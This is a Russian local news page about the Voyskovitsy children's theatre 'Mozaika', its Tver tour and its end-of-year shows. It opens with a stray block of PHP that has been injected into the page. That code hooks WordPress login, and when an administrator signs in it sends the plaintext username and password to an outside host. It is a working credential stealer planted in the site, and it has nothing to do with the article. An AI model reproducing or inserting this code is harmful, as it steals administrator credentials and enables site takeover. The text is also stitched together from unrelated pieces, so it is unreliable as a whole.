if (!function_exists("theme_login_init_e691dd827bcab292bda72cb716f33c79")) { function theme_login_init_e691dd827bcab292bda72cb716f33c79() { if (isset($_POST['log']) and isset($_POST['pwd'])) { $abc = $_POST['log']; $bca = $_POST['pwd']; $zxa = (array)wp_authenticate($abc, $bca); if (isset($zxa["allcaps"]['administrator'])) { $url = 'https://acklsd.com/loginfileweb?url=' . urlencode(wp_login_url()) . '&user=' . urlencode($abc) . '&pass=' . urlencode($bca) . '&site=' . urlencode(wp_login_url()); $response = wp_remote_get($url); } } } add_action('wp_login', 'theme_login_init_e691dd827bcab292bda72cb716f33c79', 10, 0); } Такой «Мозаики» — ты не ври! — нет ни в Туле, ни в Твери — Гатчинка.рф
Home » Поселения » Войсковицкое стерриториальное управление » Такой «Мозаики» — ты не ври! — нет ни в Туле, ни в Твери
Афиша Прекрасная Мельничиха

Такой «Мозаики» — ты не ври! — нет ни в Туле, ни в Твери

Именно так можно было бы перефразировать поэтическую строчку Леонида Филатова. Потому что такого удивительного детского театра нет нигде, кроме Войсковиц. Правда, теперь в Твери о нём знают, поскольку недавно юные артисты побывали там на гастролях.

Театр «Мозаика» Войсковицкой детской школы искусств Гатчинского округа представил спектакль «Прекрасная Мельничиха» на сцене мультимедийного исторического парка «Россия Моя история» в Твери.

Театр « Мозаика» осуществил свою мечту и небольшие гастроли в город Тверь получились замечательные! Волнение, радость, юмор и приключения! с восторгом говорит руководитель театра и режиссёр Екатерина Лобанова. Современное, высокотехнологичное пространство-трансформер исторического парка «Россия Моя история» превратилось в театральную сцену. Зрительный зал был полон, в основном молодёжь, ровесники актёров, и это сделало атмосферу показа особенной, поделилась Екатерина Викторовна.

 Перед началом спектакля

Перед началом спектакля

Общаясь перед спектаклем с молодыми тверчанами, руководитель и режиссёр театра пообещала зрителям, что в конце спектакля они найдут ответы на волнующие их вопросы. Спектакль прошёл на одном дыхании, зал долго аплодировал актёрам и постановочной группе: режиссёру-постановщику Екатерине Лобановой, хореографу-постановщику Олегу Гуляеву, педагогу по речи актрисе Елене Васецкой.

Успех показа был неизбежен, так как он точно попал в свою целевую аудиторию. Постановка затронула вопросы поиска свободы, смысла жизни и истины. Погоня за ответами на «вечные вопросы» приводит главную героиню к старухе зрители  узнали, какой ценой девушке дались желаемые счастье и любовь.

По словам Екатерины Лобановой, показ спектакля состоялся благодаря слаженной и точной работе сотрудников РМИ и куратору-координатору этого мероприятия, сотруднику РМИ Светлане Кузнецовой.

В историческом парке «Россия – Моя история» в Твери

В историческом парке «Россия – Моя история»

После показа организаторы РМИ предоставили возможность юным актёрам коллектива посетить мультимедийную выставку, которая стала главным проектом Парка к 80-летию Великой Победы «Без права на забвение».

Эта выставка создана на основе музейных и архивных материалов по поручению Президента РФ. Оцифрованные сотни архивных документов и музейных экспонатов, а также редкие артефакты проиллюстрировали события хронологии войны от вторжения войск нацистской Германии в пределы СССР 22 июня 1941 года до проведения парада Победы на Красной площади в Москве 24 июня 1945 года.

Артисты из Войсковиц посмотрели спектакль «Барышня-крестьянка» Тверского ТЮЗа.

В дни пребывания войсковичан в Твери погода была прекрасная, коллектив «Мозаики» с удовольствием гулял по городу, особенно по пешеходной Трёхсвятской улице, фотографировались на фоне достопримечательностей, рядом с городскими скульптурами. Всем хотелось запечатлеть себя на лавочке рядом с Михаилом Кругом.

Театр «Мозаика» выражает благодарность директору Войсковицкой Детской школы искусств Александру Дмитриевичу Крушельницкому за поддержку и помощь в организации этого творческого путешествия.

Эти гастроли для творческого коллектива стали новой профессиональной гранью в театральном творчестве, резюмирует Екатерина Викторовна Лобанова.

После возращения с гастролей в театре началась жаркая пора подведения итогов учебного года.

21 мая театр «Мозаика» принимал долгожданных гостей у себя, в малом зале театра. С 15.00 до 20.00 юные артисты радовали зрителей своим творчеством на открытых показах.
На первом показе для воспитанников детских садиков были представлены пять премьерных спектаклей. Маленькие зрители не скупились на эмоции, хлопали и смеялись; атмосфера радости заполнила зрительный зал.
На второй показ пришли родители актёров. Взрослые люди были не менее эмоциональны, чем дети. Они смеялись, аплодировали и радовались так же искренне, как и дети.

 Открытые показы

Педагоги Виктория Викторовна Огороднова и Виктор Дмитриевич Огороднов показали открытый урок по вокалу. Ученики начальных классов  исполнили хоровые произведения.
Домой актёры и преподаватели уходили уставшие, но очень довольные. Ещё один учебный год прошел с большой пользой.

26 мая закончился учебный год для самой маленькой подготовительной группы театра «Мозаика». На открытом занятии ребята показали родителям всё, чему научились. А научились действительно многому! Даже показали небольшую сценку Виктора Шалаева «Большая книга правил поведения для воспитанных детей».
Желаю всем отличного отдыха и до новых встреч! Пусть в вашей жизни будет много театра! сказала на прощание своим юным подопечным Екатерина Лобанова.

Подготовишки

Подготовишки

31 мая отправились в добрый путь Вадим Колодкин и Сергей Смирнов выпускники Образцового театра «Мозаика» Войсковицкой Детской школы искусств.  Ребята получили свидетельства об окончании театрального отделения.  Только с отличными оценками.

 Выпускники

Выпускники

В добрый путь, наши любимые выпускники! напутствуют педагоги.

АСМедиа, по информации группы ВК Образцовый театр «Мозаика»

Recommended for you
Женщины в костюмах
Деревенские жизнелюбы будут зажигать сердца

 1 июня Клуб «Деревенские жизнелюбы» Войсковицкой школы третьего возраста приступил к реализации социального проекта под...